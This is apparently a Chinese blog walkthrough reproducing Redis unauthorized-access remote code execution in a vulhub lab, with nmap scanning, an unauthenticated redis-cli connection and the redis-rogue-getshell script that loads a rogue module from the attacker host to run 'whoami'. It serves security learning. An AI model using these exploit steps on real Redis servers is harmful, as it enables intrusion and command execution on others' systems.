redis未授权复现-vulhub-exp

本次利用vulhub搭建环境

靶机

192.168.111.132

cd vulhub/redis/4-unacc
docker-compose build
docker-compose up -d
docker-compose ps

redis未授权复现-vulhub-exp_第1张图片
redis启动在6379端口

攻击机

192.168.111.128
kali安装redis
依次执行以下命令

wget http://download.redis.io/releases/redis-2.8.12.tar.gz 
tar -xzf redis-2.8.12.tar.gz
cd redis-2.8.12
make
cd src
./redis-cli -h

redis未授权复现-vulhub-exp_第2张图片
出现帮助信息证明安装成功

nmap扫描目标主机

nmap -sV --open -p- 192.168.111.132

redis未授权复现-vulhub-exp_第3张图片
目标机redis在6379端口

用攻击机redis连接目标机redis,发现

cd redis-2.8.12/src/
./redis-cli -h 192.168.111.132

redis未授权复现-vulhub-exp_第4张图片
利用exp

1)git clone https://github.com/vulhub/redis-rogue-getshell.git

2)cd redis-rogue-getshell/RedisModulesSDK/exp

3)make 
//当前目录下生成一个exp.so文件

4)cd ..

5)cd .. 
//回到redis-rogue-getshell目录下

6)./redis-master.py -r 192.168.111.132 -p 6379 -L 192.168.111.128 -P 8989 -f RedisModulesSDK/exp/exp.so -c "whoami"
//第一个ip是靶机,第二个ip是攻击机

redis未授权复现-vulhub-exp_第5张图片
参考:
https://blog.csdn.net/roukmanx/article/details/103682318

你可能感兴趣的:(网络安全学习)